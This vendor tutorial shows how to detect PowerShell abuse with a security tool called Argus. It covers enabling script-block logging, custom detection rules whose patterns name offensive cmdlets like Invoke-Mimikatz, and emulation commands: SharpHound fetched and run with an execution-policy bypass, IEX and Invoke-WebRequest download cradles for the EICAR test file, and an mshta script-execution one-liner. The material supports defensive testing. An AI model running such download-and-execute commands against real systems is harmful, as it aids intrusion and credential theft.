View Categories

DETECTING POWERSHELL EXPLOITATION TECHNIQUES IN WINDOWS USING ARGUS

7 min read

PowerShell is a powerful tool for managing Windows endpoints. It offers administrators the ability to control system functions, automate workflows, and streamline configuration management. Its scripting capabilities allow for the automation of complex tasks, saving time and minimizing human error.

However, these same features pose security risks, as threat actors can exploit PowerShell to execute malicious commands directly on endpoints. Attackers have used it to deploy malware, download malicious payloads, and steal sensitive data — often bypassing traditional antivirus detection. To mitigate these risks, it is crucial to monitor PowerShell activity and ensure only authorized commands are executed.

This usecase explains how Argus can be used to detect and respond to these PowerShell abuse techniques on Windows endpoints.

REQUIREMENTS

  • Argus Manager or Argus Server
  • A windows endpoint with argus agent installed

WINDOWS ENDPOINT

Steps to configure the Argus agent for log collection from PowerShell.

1.Run the following commands in PowerShell as an Administrator to enable detailed logging. By default, Windows does not log comprehensive information about executed PowerShell commands to avoid increased resource usage and storage demands. Enabling logging provides greater visibility into PowerShell activity.

function Enable-PSLogging {

    # Define registry paths for ScriptBlockLogging and ModuleLogging

    $scriptBlockPath =    ‘HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging’

    $moduleLoggingPath = ‘HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging’

    # Enable Script Block Logging

    if (-not (Test-Path $scriptBlockPath)) {

        $null = New-Item $scriptBlockPath -Force

    }

    Set-ItemProperty -Path $scriptBlockPath -Name EnableScriptBlockLogging -Value 1

    # Enable Module Logging

    if (-not (Test-Path $moduleLoggingPath)) {

        $null = New-Item $moduleLoggingPath -Force

    }

    Set-ItemProperty -Path $moduleLoggingPath -Name EnableModuleLogging -Value 1

    # Specify modules to log – set to all (*) for comprehensive logging

    $moduleNames = @(‘*’)  # To specify individual modules, replace * with module names in the array

    New-ItemProperty -Path $moduleLoggingPath -Name ModuleNames -PropertyType MultiString -Value $moduleNames -Force

    Write-Output “Script Block Logging and Module Logging have been enabled.”

}

Enable-PSLogging

The ouput expected:

 Script Block Logging and Module Logging have been enabled.

2.Add the below configuration within the <oosec_config> block of the

C:\Program Files (x86)\ossec-agent\ossec.conf file to forward powershell logs to Argus server

<localfile>

     <location>Microsoft-Windows-PowerShell/Operational</location>

     <log_format>eventchannel</log_format>

</localfile>

3.Restart the Argus agent

Restart-Service -Name wazuh

ARGUS SERVER

Steps on the Argus server to create custom rules to monitor the PowerShell events.

1.Add the custom rules to /var/ossec/etc/rules/local_rules.xml rule file:

<group name=”windows,powershell,”>

  <rule id=”100201″ level=”8″>

    <if_sid>60009</if_sid>

    <field name=”win.eventdata.payload” type=”pcre2″>(?i)CommandInvocation</field>

    <field name=”win.system.message” type=”pcre2″>(?i)EncodedCommand|FromBase64String|EncodedArguments|-e\b|-enco\b|-en\b</field>

    <description>Encoded command executed via PowerShell.</description>

    <mitre>

         <id>T1059.001</id>

         <id>T1562.001</id>

    </mitre>

  </rule>

  <rule id=”100202″ level=”4″>

      <if_sid>60009</if_sid>

      <field name=”win.system.message” type=”pcre2″>(?i)blocked by your antivirus software</field>

    <description>Windows Security blocked malicious command executed via PowerShell.</description>

    <mitre>

         <id>T1059.001</id> 

    </mitre>

  </rule>

  <rule id=”100203″ level=”10″>

    <if_sid>60009</if_sid>

    <field name=”win.eventdata.payload” type=”pcre2″>(?i)CommandInvocation</field>   

    <field name=”win.system.message” type=”pcre2″>(?i)Add-Persistence|Find-AVSignature|Get-GPPAutologon|Get-GPPPassword|Get-HttpStatus|Get-Keystrokes|Get-SecurityPackages|Get-TimedScreenshot|Get-VaultCredential|Get-VolumeShadowCopy|Install-SSP|Invoke-CredentialInjection|Invoke-DllInjection|Invoke-Mimikatz|Invoke-NinjaCopy|Invoke-Portscan|Invoke-ReflectivePEInjection|Invoke-ReverseDnsLookup|Invoke-Shellcode|Invoke-TokenManipulation|Invoke-WmiCommand|Mount-VolumeShadowCopy|New-ElevatedPersistenceOption|New-UserPersistenceOption|New-VolumeShadowCopy|Out-CompressedDll|Out-EncodedCommand|Out-EncryptedScript|Out-Minidump|PowerUp|PowerView|Remove-Comments|Remove-VolumeShadowCopy|Set-CriticalProcess|Set-MasterBootRecord</field>

    <description>Risky CMDLet executed. Possible malicious activity detected.</description>

    <mitre>

          <id>T1059.001</id> 

    </mitre>

  </rule>

  <rule id=”100204″ level=”8″>

    <if_sid>91802</if_sid>

    <field name=”win.eventdata.scriptBlockText” type=”pcre2″>(?i)mshta.*GetObject|mshta.*new ActiveXObject</field>

    <description>Mshta used to download a file. Possible malicious activity detected.</description>

    <mitre>

         <id>T1059.001</id> 

    </mitre>

  </rule>

  <rule id=”100205″ level=”5″>

    <if_sid>60009</if_sid>

    <field name=”win.eventdata.contextInfo” type=”pcre2″>(?i)ExecutionPolicy bypass|exec bypass</field>

    <description>PowerShell execution policy set to bypass.</description>

    <mitre>

          <id>T1059.001</id>

    </mitre>

  </rule>

  <rule id=”100206″ level=”5″>

    <if_sid>60009</if_sid>

    <field name=”win.eventdata.contextInfo” type=”pcre2″>(?i)Invoke-WebRequest|IWR.*-url|IWR.*-InFile</field>

    <description>Invoke Webrequest executed, possible download cradle detected.</description>

    <mitre>

          <id>T1059.001</id>

    </mitre>

  </rule>

</group>

2.Restart the Argus manager

systemctl restart wazuh-manager

ATTACK EMULATION

Execution of malicious commands

Attackers exploit PowerShell to execute malicious commands on victim endpoints, enabling them to manipulate system processes and steal sensitive information. PowerShell is a favored tool for attackers as it can run commands directly in memory, bypassing file-based security defenses and reducing detection by traditional antivirus software.

We use Powershell to execute SharpHound, a malicious tool designed to collect critical information about an endpoint.

Run the below command to simulate the invocation of SharpHound

>>curl”https://raw.githubusercontent.com/BloodHoundAD/BloodHound/refs/heads/master/Collectors/SharpHound.ps1″ -o SharpHound.ps1

>>powershell -ep bypass .\sharphound.ps1 –collectionmethod all

The below alerts are triggered on the Argus dashboard when commands invoking SharpHound are executed

Rule.id is 91809

DOWNLOADING AND EXECUTING FILES

A download cradle is a technique used to fetch and execute external scripts or payloads directly from the internet or other external sources. It is a common method for exploiting PowerShell, allowing attackers to retrieve and run malicious content in a single step, often evading traditional file-based security measures.

Run the command below to download and execute the EICAR malware test file.

>> powershell -Command “IEX(New-Object Net.WebClient).DownloadString(‘https://secure.eicar.org/eicar.com.txt -OutFile eicar;.\eicar’)”

The below alert is triggered on the dashboard when the command is executed.

Another way a download cradle can be invoked is with the Invoke-Webrequest command. A malicious user can download and execute a malicious payload using this method.

Run the below command to simulate the activity

>> Invoke-WebRequest https://secure.eicar.org/eicar.com.txt -OutFile eicar;.\eicar

The following alert is triggered on the Argus dashboard when the command is executed.

Rule ID 100206 detects a possible download cradle where invoke-webrequest is used to download a file.

LIVING OFF THE LAND

 Living off the land (LOTL) techniques involve leveraging legitimate, built-in tools to execute malicious commands, reducing the need to download new malware and lowering the chance of detection. Attackers frequently exploit trusted Microsoft-signed binaries like mshta.exe, which is used to run Microsoft HTML applications. By abusing mshta.exe, attackers can execute malicious JavaScript or VBScript directly from a URL or embedded script, enabling the download and execution of payloads. This method allows threat actors to mimic normal system activity, making it harder for security solutions to identify and block the threat.

Run the command to simulate a LOTL attack. This tries to execute a JavaScript file directly from a URL:

>> mshta.exe “javascript:a=GetObject(‘script:#{url}’).Exec();close()”

The below alert is triggered on the dashboard when the command is executed.

Rule ID 100204 detects when Mshta is used to download and execute a file.

CONCLUSION

PowerShell is a powerful tool that system administrators use to manage and automate tasks on Windows endpoints. However, attackers can misuse PowerShell to execute malicious commands, often bypassing detection by traditional security solutions. This document showcases how to use Argus to detect some PowerShell exploitation techniques.

Leave a Reply

Your email address will not be published. Required fields are marked *